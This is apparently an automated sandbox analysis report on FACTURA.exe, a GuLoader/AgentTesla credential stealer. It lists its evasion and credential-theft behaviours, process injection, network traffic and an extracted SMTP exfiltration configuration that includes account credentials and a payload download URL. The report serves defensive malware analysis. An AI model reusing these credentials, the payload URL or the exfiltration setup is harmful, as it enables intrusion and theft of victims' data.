Loading ...

Play interactive tourEdit tour

Windows Analysis Report FACTURA.exe

Overview

General Information

Sample Name:FACTURA.exe
Analysis ID:1380
MD5:dbe61cfd43c95752f6dfbde236558782
SHA1:71b7f9ea7778a67ffc75fa0f7d8a74dc243aae22
SHA256:7194eca2c497f9ea9c3bb989fb7f328d9740b6d396af39ec66ec730c0db61044
Infos:

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Sigma detected: RegAsm connects to smtp port
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • FACTURA.exe (PID: 4752 cmdline: 'C:\Users\user\Desktop\FACTURA.exe' MD5: DBE61CFD43C95752F6DFBDE236558782)
    • RegAsm.exe (PID: 392 cmdline: 'C:\Users\user\Desktop\FACTURA.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • conhost.exe (PID: 376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "murbano@reyesyasociados.com495QTi314mail.reyesyasociados.comnappiboioffice203@gmail.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.17251666746.00000000007B0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000005.00000002.21802616572.000000001DEC1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.21802616572.000000001DEC1000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: RegAsm.exe PID: 392JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: RegAsm.exe PID: 392JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Sigma Overview

            Networking:

            barindex
            Sigma detected: RegAsm connects to smtp portShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 109.169.39.245, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 392, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49795

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: RegAsm.exe.392.5.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "murbano@reyesyasociados.com495QTi314mail.reyesyasociados.comnappiboioffice203@gmail.com"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: FACTURA.exeVirustotal: Detection: 24%Perma Link
            Source: FACTURA.exeReversingLabs: Detection: 26%
            Source: FACTURA.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.11.20:49792 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.11.20:49793 version: TLS 1.2

            Networking:

            barindex
            Source: Joe Sandbox ViewASN Name: IOMART-ASGB IOMART-ASGB
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Joe Sandbox ViewIP Address: 109.169.39.245 109.169.39.245
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_9grCzaMvwiyOZmqGYlclu_imIL5MBHK HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/1bb12mp9hm55ekloh95nskj64c1gjp2b/1632812250000/00519186742208262786/*/1_9grCzaMvwiyOZmqGYlclu_imIL5MBHK?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-08-50-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.11.20:49795 -> 109.169.39.245:587
            Source: global trafficTCP traffic: 192.168.11.20:49795 -> 109.169.39.245:587
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
            Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: RegAsm.exe, 00000005.00000002.21803487459.000000001DF6C000.00000004.00000001.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
            Source: RegAsm.exe, 00000005.00000002.21802616572.000000001DEC1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: RegAsm.exe, 00000005.00000002.21802616572.000000001DEC1000.00000004.00000001.sdmpString found in binary or memory: http://DXdVhu.com
            Source: RegAsm.exe, 00000005.00000002.21802616572.000000001DEC1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: RegAsm.exe, 00000005.00000002.21809297485.0000000020060000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: RegAsm.exe, 00000005.00000003.18145548653.00000000010EE000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: RegAsm.exe, 00000005.00000002.21809297485.0000000020060000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: RegAsm.exe, 00000005.00000002.21809297485.0000000020060000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
            Source: RegAsm.exe, 00000005.00000003.18145548653.00000000010EE000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: RegAsm.exe, 00000005.00000002.21804041737.000000001DFD2000.00000004.00000001.sdmpString found in binary or memory: http://mail.reyesyasociados.com
            Source: RegAsm.exe, 00000005.00000002.21809297485.0000000020060000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: RegAsm.exe, 00000005.00000002.21804333470.000000001DFFD000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.21804041737.000000001DFD2000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.21803487459.000000001DF6C000.00000004.00000001.sdmpString found in binary or memory: https://7IjlG5MRJ8GuV06p17GS.com
            Source: RegAsm.exe, 00000005.00000003.17225649108.00000000010F1000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
            Source: RegAsm.exe, 00000005.00000003.18145277985.00000000010BF000.00000004.00000001.sdmpString found in binary or memory: https://doc-08-50-docs.googleusercontent.com/
            Source: RegAsm.exe, 00000005.00000003.18145548653.00000000010EE000.00000004.00000001.sdmpString found in binary or memory: https://doc-08-50-docs.googleusercontent.com/%%doc-08-50-docs.googleusercontent.com
            Source: RegAsm.exe, 00000005.00000003.17225649108.00000000010F1000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.17229535337.00000000010F8000.00000004.00000001.sdmpString found in binary or memory: https://doc-08-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/1bb12mp9
            Source: RegAsm.exe, 00000005.00000002.21792632666.0000000001078000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
            Source: RegAsm.exe, 00000005.00000002.21792632666.0000000001078000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1_9grCzaMvwiyOZmqGYlclu_imIL5MBHK
            Source: RegAsm.exe, 00000005.00000002.21791838141.0000000000BF0000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1_9grCzaMvwiyOZmqGYlclu_imIL5MBHKwininet.dllMozilla/5
            Source: RegAsm.exe, 00000005.00000002.21802616572.000000001DEC1000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.21802999084.000000001DF12000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
            Source: RegAsm.exe, 00000005.00000002.21802616572.000000001DEC1000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com//
            Source: RegAsm.exe, 00000005.00000002.21802616572.000000001DEC1000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: RegAsm.exe, 00000005.00000002.21802616572.000000001DEC1000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/v104
            Source: RegAsm.exe, 00000005.00000002.21809297485.0000000020060000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
            Source: RegAsm.exe, 00000005.00000002.21802999084.000000001DF12000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: RegAsm.exe, 00000005.00000002.21802616572.000000001DEC1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_9grCzaMvwiyOZmqGYlclu_imIL5MBHK HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/1bb12mp9hm55ekloh95nskj64c1gjp2b/1632812250000/00519186742208262786/*/1_9grCzaMvwiyOZmqGYlclu_imIL5MBHK?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-08-50-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.11.20:49792 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.11.20:49793 version: TLS 1.2
            Source: FACTURA.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\FACTURA.exeCode function: 1_2_004088D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00E41130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00E4BA70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00E43A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00E44320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00E4C7D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00E43708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00EA6988
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00EA1420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00F0C4FA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_01289180
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0128D897
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_01289BD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_012844F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_01283330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_012C2978
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_012CE318
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_012C114F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_012C0040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_20164ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_20165E08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_20166AF1
            Source: FACTURA.exe, 00000001.00000002.17251391964.0000000000415000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameexposure.exe vs FACTURA.exe
            Source: FACTURA.exeBinary or memory string: OriginalFilenameexposure.exe vs FACTURA.exe
            Source: FACTURA.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\FACTURA.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edgegdi.dll
            Source: FACTURA.exeVirustotal: Detection: 24%
            Source: FACTURA.exeReversingLabs: Detection: 26%
            Source: FACTURA.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\FACTURA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\FACTURA.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: unknownProcess created: C:\Users\user\Desktop\FACTURA.exe 'C:\Users\user\Desktop\FACTURA.exe'
            Source: C:\Users\user\Desktop\FACTURA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\FACTURA.exe'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\FACTURA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\FACTURA.exe'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\FACTURA.exeFile created: C:\Users\user\AppData\Local\Temp\~DFC94F68EA869C20C4.TMPJump to behavior
            Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@4/1@3/3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:376:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:376:304:WilStaging_02
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000001.00000002.17251666746.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\FACTURA.exeCode function: 1_2_00404C45 push ds; retf
            Source: C:\Users\user\Desktop\FACTURA.exeCode function: 1_2_00404CEF push es; retf
            Source: C:\Users\user\Desktop\FACTURA.exeCode function: 1_2_00402EAF push edi; ret
            Source: C:\Users\user\Desktop\FACTURA.exeCode function: 1_2_0040710A push ebp; iretd
            Source: C:\Users\user\Desktop\FACTURA.exeCode function: 1_2_00407328 push edx; ret
            Source: C:\Users\user\Desktop\FACTURA.exeCode function: 1_2_007B1061 push esp; iretd
            Source: C:\Users\user\Desktop\FACTURA.exeCode function: 1_2_007B289A push edx; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_012C4908 push edi; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_012C48B8 push edi; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_012C24E8 pushfd ; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_2016A19C push ebp; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_2016A2CF push ebx; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_2016C43F push esp; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_2016C45B push ebx; iretd
            Source: C:\Users\user\Desktop\FACTURA.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\FACTURA.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\FACTURA.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\FACTURA.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\FACTURA.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
